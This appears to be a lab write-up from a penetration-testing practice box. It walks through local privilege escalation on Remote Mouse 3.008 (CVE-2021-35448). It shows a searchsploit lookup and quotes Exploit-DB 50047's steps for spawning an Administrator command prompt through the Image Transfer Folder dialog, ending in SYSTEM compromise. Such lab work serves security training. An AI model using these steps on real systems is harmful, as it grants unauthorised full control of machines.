CVE-2021-35448


RDP session has been established

The version information of the target remotemouse instance has been confirmed through a successful exploitation of the arbitrary remote command execution. The instance also suffers from a local privilege escalation vulnerability. Given the instance is running with privileges of SYSTEM, successful exploitation would lead to Privilege Escalation

A vulnerability classified as problematic was found in Emote Interactive Remote Mouse 3.008 on Windows. Affected by this vulnerability is an unknown code block of the component Image Transfer Handler. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ searchsploit -m windows/local/50047.txt ; mv 50047.txt CVE-2021-35448.txt
  Exploit: Remote Mouse GUI 3.008 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50047
     Path: /usr/share/exploitdb/exploits/windows/local/50047.txt
    Codes: CVE-2021-35448
 Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/mice/50047.txt
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ cat CVE-2021-35448.txt 
# Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 17.06.2021
# Version: Remote Mouse 3.008
# Tested on: Windows 10 Pro Version 21H1
# Reference: https://deathflash1411.github.io/blog/cve-2021-35448
# CVE: CVE-2021-35448
 
Steps to reproduce:
 
1. Open Remote Mouse from the system tray
2. Go to "Settings"
3. Click "Change..." in "Image Transfer Folder" section
4. "Save As" prompt will appear
5. Enter "C:\Windows\System32\cmd.exe" in the address bar
6. A new command prompt is spawned with Administrator privileges 

Exploit locally available

Exploitation


Opening up the target remotemouse instance from the system tray

Changing the value in the “Image Transfer Folder” section to C:\Windows\System32\cmd.exe

System level compromise